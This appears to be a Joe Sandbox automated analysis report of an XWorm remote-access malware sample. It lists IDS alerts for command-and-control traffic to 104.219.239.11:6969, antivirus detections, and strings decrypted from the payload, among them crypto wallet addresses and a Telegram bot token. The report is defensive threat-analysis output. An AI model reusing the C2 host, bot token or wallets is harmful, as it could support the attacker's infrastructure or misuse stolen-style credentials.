                        2024-10-17T00:24:23.125089+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:24.530533+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:29.469124+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:29.502295+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:31.377348+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:35.536933+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:40.926137+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:42.396798+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:45.756387+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:45.773329+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:45.798311+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:45.802222+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:45.849467+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:45.958962+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:52.812004+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:01.103272+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:03.814749+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:12.386381+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:16.752956+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:21.628026+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:21.704476+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:21.776924+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:21.788715+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:24.812640+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:30.748080+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:32.538794+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:42.413793+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:44.001796+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:45.099249+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:47.658123+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:54.221084+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:54.320976+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:54.365522+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:54.455340+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:54.558358+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:55.060187+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:55.601741+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:00.050392+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:00.101835+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:00.143069+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:00.199346+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:00.260701+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:00.351120+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:06.811919+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:10.493265+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:12.034898+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:12.096656+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:12.383469+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:12.758266+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:17.719099+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:20.535485+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:29.032624+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:42.092412+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:42.382988+020028528701Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-17T00:22:58.756750+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:58.868312+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:58.980482+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.087171+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.200778+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.326211+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.431434+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.545732+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.649937+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.759677+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.868781+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.977484+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.091605+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.197078+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.305782+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.585708+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.737184+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.854379+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.961972+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:01.071482+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:01.182029+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:01.290048+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:01.412724+020028529231Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:06.942766+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:23:19.707126+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:23:32.764891+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:23:45.597366+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:23:53.177333+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:01.251151+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:06.551647+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:06.614057+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:09.209077+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:17.746690+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:22.474606+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:23.133624+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:24.535967+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:29.473465+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:29.503624+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:31.460547+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:35.539250+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:40.928694+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:45.758473+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:45.774939+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:45.799751+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:45.849523+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:45.902707+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:45.962327+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:24:52.829660+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:01.108741+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:03.816459+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:16.756797+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:21.630224+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:21.706613+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:21.779140+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:21.790917+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:24.814452+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:30.752716+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:32.589358+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:44.004008+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:45.104691+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:47.666606+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:54.225880+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:54.323404+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:54.414900+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:54.457085+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:54.559955+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:55.065314+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:55.605482+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:00.052820+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:00.190850+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:00.200905+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:00.262372+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:00.315575+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:00.353067+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:06.813894+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:10.495422+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:12.037201+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:12.098554+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:12.764622+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:17.721563+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:20.537338+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:29.035136+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:42.093278+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-17T00:23:12.347752+020028528741Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:23:42.378257+020028528741Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:12.381741+020028528741Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:24:42.396798+020028528741Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:12.386381+020028528741Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:25:42.413793+020028528741Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:12.383469+020028528741Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        2024-10-17T00:26:42.382988+020028528741Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-17T00:22:58.756750+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:58.868312+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:58.980482+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.087171+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.200778+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.326211+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.431434+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.545732+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.649937+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.759677+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.868781+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:22:59.977484+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.091605+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.197078+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.305782+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.585708+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.737184+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.854379+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:00.961972+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:01.071482+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:01.182029+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:01.290048+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        2024-10-17T00:23:01.412724+020028528731Malware Command and Control Activity Detected192.168.2.649841104.219.239.116969TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-17T00:24:45.571519+020028531931Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-17T00:22:56.259148+020028531911Malware Command and Control Activity Detected104.219.239.116969192.168.2.649809TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-17T00:22:55.800953+020028531921Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\Documents\OneDrive.exeReversingLabs: Detection: 55%
                        Multi AV Scanner detection for submitted file
                        Source: b39wW3jYKO.exeReversingLabs: Detection: 55%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\Documents\OneDrive.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: b39wW3jYKO.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 9.0.arndry.exe.1d0000.0.unpackString decryptor: 104.219.239.11
                        Source: 9.0.arndry.exe.1d0000.0.unpackString decryptor: 6969
                        Source: 9.0.arndry.exe.1d0000.0.unpackString decryptor: <123456789>
                        Source: 9.0.arndry.exe.1d0000.0.unpackString decryptor: <Xwormmm>
                        Source: 9.0.arndry.exe.1d0000.0.unpackString decryptor: NEW
                        Source: 9.0.arndry.exe.1d0000.0.unpackString decryptor: USB.exe
                        Source: 9.0.arndry.exe.1d0000.0.unpackString decryptor: %AppData%
                        Source: 9.0.arndry.exe.1d0000.0.unpackString decryptor: OneDrive.exe
                        Source: 9.0.arndry.exe.1d0000.0.unpackString decryptor: bc1q4en48gkr2a0yqjdtp2sw5x0l6tam0wk276puvr
                        Source: 9.0.arndry.exe.1d0000.0.unpackString decryptor: 0x3B6faE0078a049EA7829711330E040CF8298ae57
                        Source: 9.0.arndry.exe.1d0000.0.unpackString decryptor: TN9bbwK3RTX7XhwqH1uDT7TPWmjPM8zKKm
                        Source: 9.0.arndry.exe.1d0000.0.unpackString decryptor: 5372344229:AAEM46DF5hWBLPbN5UErJaoJvlNvm-ZJXyg
                        Source: 9.0.arndry.exe.1d0000.0.unpackString decryptor: @Buddyv2bot
                        Source: b39wW3jYKO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Xml.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.ni.pdbRSDS source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: b39wW3jYKO.exe, 00000000.00000002.4646804706.000001419AFB0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: b39wW3jYKO.exe, b39wW3jYKO.exe, 00000000.00000002.4646804706.000001419AFB0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Configuration.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: mscorlib.pdb0 source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: protobuf-net.pdb source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Configuration.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Core.pdbH source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Xml.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Core.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: mscorlib.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Configuration.pdb8e source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Management.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: Microsoft.VisualBasic.pdbP4 source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Management.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Core.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER31B8.tmp.dmp.12.dr
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Windows\SYSTEM32\MSVFW32.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Windows\SYSTEM32\en-US\avicap32.dll.muiJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Windows\SYSTEM32\en-US\MSVFW32.dll.muiJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Windows\system32\wbem\en-US\wmiutils.dll.muiJump to behavior

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.6:49809 -> 104.219.239.11:6969
                        Source: Network trafficSuricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 104.219.239.11:6969 -> 192.168.2.6:49809
                        Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.6:49841 -> 104.219.239.11:6969
                        Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49841 -> 104.219.239.11:6969
                        Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49809 -> 104.219.239.11:6969
                        Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 104.219.239.11:6969 -> 192.168.2.6:49809
                        Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49809 -> 104.219.239.11:6969
                        Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 104.219.239.11:6969 -> 192.168.2.6:49809
                        Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49809 -> 104.219.239.11:6969
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED
                        Source: global trafficTCP traffic: 192.168.2.6:49809 -> 104.219.239.11:6969
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                        Source: Joe Sandbox ViewASN Name: DATAWAGONUS DATAWAGONUS
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.11
